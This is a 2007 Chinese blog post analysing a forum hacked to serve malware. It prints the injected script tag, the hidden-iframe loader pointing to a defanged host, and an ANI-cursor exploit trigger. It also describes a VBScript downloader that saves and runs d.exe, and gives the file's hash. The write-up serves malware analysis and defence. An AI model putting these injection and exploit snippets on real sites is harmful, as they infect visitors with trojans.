endurer 原创
2007-05-27 第1版
刚才去
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
http://endurer.bokee.com/6279320.html
http://blog.sina.com.cn/u/49926d91010008qj
http://blog.csdn.net/Purpleendurer/archive/2007/05/17/1613097.aspx
http://purple-endurer.blogspot.com/2007/05/jpg-or-trojanwin32vbazc.html
中的论坛转了转,发现挂的马变了,瑞星报告发现:Trojan.DL.VBS.Small.ei和Hack.SuspiciousAni。
网页首部植入的代码变为:
/---
<script language=javascript src=hxxp://www**.8**8*vcd.com/htm*/china***/menu**.js></script>
---/
menu**.js 包含代码:
/---
document.writeln("<iframe src=/"hxxp:////www**.8**8*vcd.com//htm*//china***//index*.htm/" width=/"100/" height=/"0/" frameborder=/"0/"><//iframe>");
---/
index*.htm 的title居然是:“人民公社”,包含两段恶意代码。
其一是VBScript脚本,没有加密,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 d.exe,保存为 c:/0.exe,然后通过 Shell.Application 对象 Q 的 ShellExecute 方法 来运行。
文件说明符 : D:/test/d.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-27 21:38:15
修改时间 : 2007-5-27 21:38:24
访问时间 : 2007-5-27 0:0:0
大小 : 18432 字节 18.0 KB
MD5 : b7e3a902048a9a5e12204083a935f64e
瑞星 19.24.61 没反应
|
Scanned file: d.exe |
Statistics:
|
其二是
/---
<iframe src=IE0day.htm width=100 height=0></iframe>
---/
IE0day.htm 包含代码:
/---
<DIV style="CURSOR: url('0day.jpg')">
---/
0day.jpg 利用 ANI 漏洞下载 d.exe